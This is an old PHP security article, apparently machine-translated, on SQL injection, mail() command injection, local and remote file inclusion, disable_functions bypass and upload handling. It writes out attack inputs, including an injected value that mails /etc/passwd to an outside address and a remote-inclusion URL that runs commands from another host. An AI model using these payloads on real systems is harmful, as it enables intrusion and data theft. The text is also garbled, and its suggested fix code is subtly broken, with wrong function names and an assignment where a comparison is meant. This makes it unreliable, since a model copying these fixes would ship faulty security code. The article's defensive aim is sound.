The title of the PHP file is uploaded in the article "upload. Thanks to the supply of is after php-4.0.3
1. Ancient spoofing SQL statements
In the default mode, even if you forget to copy php. ini to/usr/local/lib/php. ini, php still opens magic_quotes_gpc = on.
In this way, the single quotation marks ('), double quotation marks ('), backslash (\), and empty characters NUL of all variables from GET/POST/Cookie
(The null byte) will be added with a backslash, so that the database can be accurately queried.
But a configuration file php. ini-optimized was introduced in the php-4-RC2, but the optimized php. ini is
Magic_quotes_gpc = off. Some network administrators may copy php. ini-optimized
/Usr/local/lib/php. ini is dangerous. Similar to simple verification, assuming that no necessary characters are filtered:
Select * from login where user = '$ HTTP_POST_VARS [user]' and pass = '$ HTTP_POST_VARS [pass]'
We can enter 1 'or 1 =' 1 in the user box and password box for verification. This is an antique method. this statement will
Change to the following:
Select * from login where user = '1' or 1 = '1' and pass = '1' or 1 = '1'
Because or 1 = '1' was set up, it passed.
The best solution is to filter out all unnecessary characters, and we recommend that you use GET/POST/Cookie in SQL
Add a custom function to the variable in:
Function gpc2sql ($ str ){
If (get_magic_quotes_gpc () = 1)
Return $ str;
Else
Return addslashes ($ str );
}
It is important for your program to be securely transplanted to various systems.
2. the fifth parameter of the mail function
In the php-4.0.5, the mail function introduced the fifth parameter to set additional command line parameters when actually sending the mail, but there is no good check for special SHELL command characters, therefore, the title of executing the command is displayed. Just like the example in the manual:
Mail ('Nobody @ aol.com ', 'The subobject', $ message, 'From: webmaster @ $ SERVER_NAME', '-fwebmaster @ $ SERVERNAM ');
This is the title, if $ SERVER_NAME =; mail webjx@webjx.com </etc/passwd can send the machine password to my mailbox.
Here, I would like to remind you that there are several examples of security titles in the php Manual. you should not copy them when using them. it only demonstrates the basic functions of functions and you can understand them.
For the title of the mail function, we do not need to use the fifth parameter in the simplest way. to apply this parameter, we need to filter out invalid characters such (;), the php source code package's program ext/standard/mail is also corrected. c, in if (extra_cmd! = NULL) {add the following line before:
Extra_cmd = NULL
Then re-compile.
3. UNIX edition require and include functions
The require and include functions in win versions do not support remote file inclusion in HTTP and FTP, while the UNIX version supports remote file inclusion by default.
Require and include, no matter what your extended names are, include you as part of the program.
During program writing, many require or include functions are inevitably used for program modularization and program portability, and sometimes variables are used as parameters, such: include ('$ something'); if the user can hold the $ something parameter, and this parameter is not filtered, it will be miserable.
First, you can view the files that any web user has read permission. assume that this program is called http: // victim/test. php, so that we can use the following
Url: http: // victim/test. php? Something =/etc/passwd to see the/etc/passwd file.
In addition, you can execute commands by using the functions contained in the remote file. For example, if I create a file test. php under www.AAA.org, the content is:
Then I can use the following url:
Http: // victim/test. php? Something = http://www.xfocus.org/test.php? Cmd = uname
Command.
PhpMyAdmin also displays this title. we can use it to view any files we want to see. However, before the include operation, it first uses the file_exist function to determine whether a file exists. this file_exist function does not support remote files, so the second method above cannot be applied directly. However, we can use the log function of apache to request a url with php code. in this way, the logs specified as apache can also execute commands, but apache logs are usually relatively large, there is too much confusion information.
The upload method uploads the script for executing the local command. a file name such as php8Ta02I will be generated in the temporary directory of the server file upload. because the file exists at this time, therefore, you can use the file_exist function to execute scripts in the uploaded files.
Therefore, the application of the include and require functions must be vigilant, especially when the contained files are specified with parameters. the parameters cannot be controlled by users. You can also remove the remote file by modifying the php. ini file to include this function. This was previously closed with disable-url-fopen-wrapper in later versions with allow_url_fopen = off.
4. disable_function
In the php-4.0.1, php. ini introduced a function disable_functions, this function is more useful, you can use it to prohibit some functions.
For example, in php. when disable_functions = passthru exec system popen is added to ini, the system () has been disabled for security reasons will only be prompted when these functions are executed. alas, but there is no way to execute system commands. Because php uses many perl features, for example, you can use (') to execute the command:
$ Output = 'ls-Al ';
Echo'
$output
';
?>
This can only be avoided by setting it to safe_mode. However, there are too many limits on the hateful safe_mode, and other things may be out of the way.
5. file upload
The title of the PHP file is uploaded in the article "upload.
Fortunately, the is_uploaded_file and move_uploaded_file functions are provided after the php-4.0.3. So the php-4.0.3 above the Upload file program must not use the copy function, instead of move_uploaded_file, it will check whether the file is uploaded. For php-4.0.2 and the following, we recommend adding a function before copy:
Function is_uploaded_file ($ filename ){
If (! $ Tmp_file = get_cmd_var ('upload _ tmp_dir ')){
$ Tmp_file = dirname (tempnam ('',''));
}
$ Tmp_file. = '/'. basename ($ filename );
/* User might have trailing slash in php. ini ...*/
Return (ereg_replace ('/', '/', $ tmp_file) = $ filename );
}
This vulnerability has been in the security focus for a long time, but there are a lot of statements to verify and determine before the copy operation, so it is quite difficult to make the attack.
Also, do not use environment variables, Cookie variables, session variables, and other variables as the criteria for determining the death of the link, because these variables are too easy to fabricate.
Haha, there are a lot of things at hand, and the other ones are coming to be added. you are also welcome to add and correct any other things in the same way.